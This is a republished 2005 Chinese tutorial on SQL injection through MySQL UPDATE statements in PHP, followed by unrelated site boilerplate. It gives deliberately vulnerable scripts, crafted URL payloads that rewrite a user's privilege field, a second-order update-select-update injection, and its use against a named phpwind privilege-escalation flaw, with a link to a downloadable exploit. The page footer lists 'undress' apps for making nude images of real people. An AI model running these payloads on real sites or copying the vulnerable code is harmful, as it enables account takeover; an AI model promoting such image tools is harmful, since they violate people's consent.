UPDATE注射(mysql+php)的两个模式_PHP
本文作者:SuperHei
文章性质:原创
发布日期:2005-08-14
一、测试环境
OS: Windowsxp sp2
php: php 4.3.10
mysql 4.1.9
apache 1.3.33
二、测试数据库结构
-- 数据库: `test`
--
-- --------------------------------------------------------
--
-- 表的结构 `userinfo`
--
CREATE TABLE `userinfo` (
`groudid` varchar(12) NOT NULL default '1',
`user` varchar(12) NOT NULL default 'heige',
`pass` varchar(122) NOT NULL default '123456'
) TYPE=MyISAM;
--
-- 导出表中的数据 `userinfo`
--
INSERT INTO `userinfo` VALUES ('2', 'heige', '123456')
三、测试模式
1、变量没有带''或""
//test1.php Mod1
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
$sql = "update userinfo set pass=$p where user='heige'";//
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "
SQL Query:$sql
";
?>
脚本里只是修改 user='heige' 的 pass,如果 groudid 表示用户的权限等级,我们的目的就是通过构造 $p 来达到修改 groupid 的目的,那么我们提交:
http://127.0.0.1/test1.php?p=123456,groudid=1
在mysql里查询:
mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user | pass |
+---------+-------+--------+
| 1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.01 sec)
用户heige的groudid又2改为1了 :)
所以我们可以得到没有''或""update的注射是可以成功的,这个就是我们的模式1。
2、变量带''或""
//test2.php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
$sql = "update userinfo set pass='$p' where user='heige'";//
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "
SQL Query:$sql
";
?>
为了关闭'我们构造$p应该为 123456',groudid='2 提交:
http://127.0.0.1/test2.php?p=123456',groudid='1
在gpc=on的情况下'变成了\',提交的语句变成:
SQL Query:update userinfo set pass='123456\',groudid=\'1' where user='heige'
mysql查询:
mysql> select * from userinfo;
+---------+-------+--------------------+
| groudid | user | pass |
+---------+-------+--------------------+
| 2 | heige | 123456',groudid='1 |
+---------+-------+--------------------+
1 row in set (0.00 sec)
groudid并没有被修改。那么在变量被''或""时 就完全没有被注射呢?不是 下面我们看模式2:
//test3.php Mod2
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
$sql = "update userinfo set pass='$p' where user='heige'";//
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //$p的数据写入数据库
$sql= "select pass from userinfo where user='heige'";
$result = mysql_db_query($dbname, $sql);
$userinfo=mysql_fetch_array($result);
echo $userinfo[0]; //把pass查询输出给$userinfo[0]
$sql ="update userinfo set pass='$userinfo[0]' where user='heige'";
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //把$userinfo[0] 再次update
?>
我们测试下,提交:
http://127.0.0.1/test3.php?p=123456',groudid='1
回mysql查询下 :
mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user | pass |
+---------+-------+--------+
| 1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.00 sec)
HaHa~~ 成功注射 修改groudid为1。 这个就是我们的模式2了,简单的描叙如下:
update --> select --> update
四、实际模式
模式1:缺
模式2:phpwind 2.0.2和3.31e 权限提升漏洞
漏洞分析
update (profile.php 注射变量为$proicon update语句里为,icon='$userdb[icon]')
↓
select (jop.php)
↓
updtate (jop.php)
Exploit: http://www.huij.net/9xiao/up/phpwind-exploit.exe
五、鸣谢
特别感谢saiy等朋友的讨论和帮助。Thanks!!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1392
52
What does WeChat's Do Not Disturb mode do?
Feb 23, 2024 pm 10:48 PM
What does WeChat Do Not Disturb mode mean? Nowadays, with the popularity of smartphones and the rapid development of mobile Internet, social media platforms have become an indispensable part of people's daily lives. WeChat is one of the most popular social media platforms in China, and almost everyone has a WeChat account. We can communicate with friends, family, and colleagues in real time through WeChat, share moments in our lives, and understand each other’s current situation. However, in this era, we are also inevitably faced with the problems of information overload and privacy leakage, especially for those who need to focus or
What is sleep mode used for on iPhone?
Nov 04, 2023 am 11:13 AM
iOS devices have long been able to track your sleep patterns and more using the Health app. But isn’t it annoying when you’re disturbed by notifications while you’re sleeping? These notifications may be irrelevant and therefore disrupt your sleep patterns in the process. While Do Not Disturb mode is a great way to avoid distractions while sleeping, it can cause you to miss important calls and messages you receive during the night. Thankfully, this is where sleep mode comes in. Let’s learn more about it and how to use it on iPhone. What role does sleep mode play on the iPhone? Sleep mode is a dedicated focus mode in iOS that is automatically activated based on your sleep schedule in the "Health" App. It helps you set an alarm and then
Do Not Disturb Mode Not Working in iPhone: Fix
Apr 24, 2024 pm 04:50 PM
Even answering calls in Do Not Disturb mode can be a very annoying experience. As the name suggests, Do Not Disturb mode turns off all incoming call notifications and alerts from emails, messages, etc. You can follow these solution sets to fix it. Fix 1 – Enable Focus Mode Enable focus mode on your phone. Step 1 – Swipe down from the top to access Control Center. Step 2 – Next, enable “Focus Mode” on your phone. Focus Mode enables Do Not Disturb mode on your phone. It won't cause any incoming call alerts to appear on your phone. Fix 2 – Change Focus Mode Settings If there are some issues in the focus mode settings, you should fix them. Step 1 – Open your iPhone settings window. Step 2 – Next, turn on the Focus mode settings
What does epc+o mode mean?
Nov 09, 2022 am 10:54 AM
The epc+o model refers to the general contracting framework that integrates design, procurement, etc. It is some operational links derived from epc; that is, during the construction period, the general contractor must not only undertake design tasks in the traditional sense In addition, it also has to undertake all maintenance tasks during the operation period. This model can greatly improve the operational efficiency of many projects and quickly reduce operating costs.
iPhone 15 Pro: How to get rid of the silent mode symbol in the status bar
Sep 24, 2023 pm 10:01 PM
On iPhone 15 Pro and iPhone 15 Pro Max models, Apple introduced a physically programmable action button that replaces the traditional ring/silent switch above the volume buttons. The action button can be programmed to perform several different functions, but the ability to switch between silent and ring modes isn't gone. By default, a long press on the action button will silence the device and the button's tactile feedback will pulse three times. Both iPhone 15 Pro models will display a crossed-out bell symbol next to the time in the status bar to indicate that silent/silent mode is activated, and it will remain so until you long-press the Action button again to unmute the device. If you prefer to put your iPhone in silent mode
How to leave S mode on Windows 10/11
Aug 03, 2023 pm 08:17 PM
Windows in S mode is designed to provide enhanced security and performance by only allowing the installation of apps from the Microsoft Store. While this feature helps prevent malware and ensure a secure computing environment, it may limit users who want to install applications from sources other than the Microsoft Store. If you find yourself in this situation and keep asking yourself how to switch out of S mode in Windows 10/11, then you have come to the right place as we will walk you through how to switch out in Windows 10/11 using two different methods Steps to S Mode ensure you can enjoy the freedom of installing apps from anywhere you choose. Learn how to switch out of S mode in Windows
How to enable 'Notepad++ Dark Mode' and 'Notepad++ Dark Theme'?
Oct 27, 2023 pm 11:17 PM
Notepad++ dark mode v8.0 has no parameters, Notepad++ is the most useful text editor. Every app running on Windows 10 supports dark mode. You can name web browsers such as Chrome, Firefox, and Microsoft Edge. If you work on Notepad++, the default white background may hurt your eyes. Developers have added dark mode to version 8 of Notepad++, here's how to turn it on. Enable Notepad for Windows 11/10 ++ Dark Mode Launch Notepad ++ Click "Settings" > "Preferences" > "Dark Mode" Select "Enable Dark Mode" to restart Notepad
Guide to using standby mode in iOS 17
Aug 22, 2023 pm 04:01 PM
Standby mode is coming to iPhone with iOS17, and this guide aims to show you how to use this feature on your iPhone. Standby Mode is a breakthrough feature that transforms iPhone into a dynamic, always-on smart display. When your iPhone is laid horizontally on its side during charging, it activates standby mode. This mode beautifully showcases a host of useful widgets, including but not limited to the current time, local weather updates, a slideshow of your favorite photos, and even music playback controls. A significant advantage of this mode is its ability to display notifications, allowing users to view and engage with them without having to fully wake up their iPhone. How to Use Standby Mode For Standby Mode to work properly, your iPhone must be running i
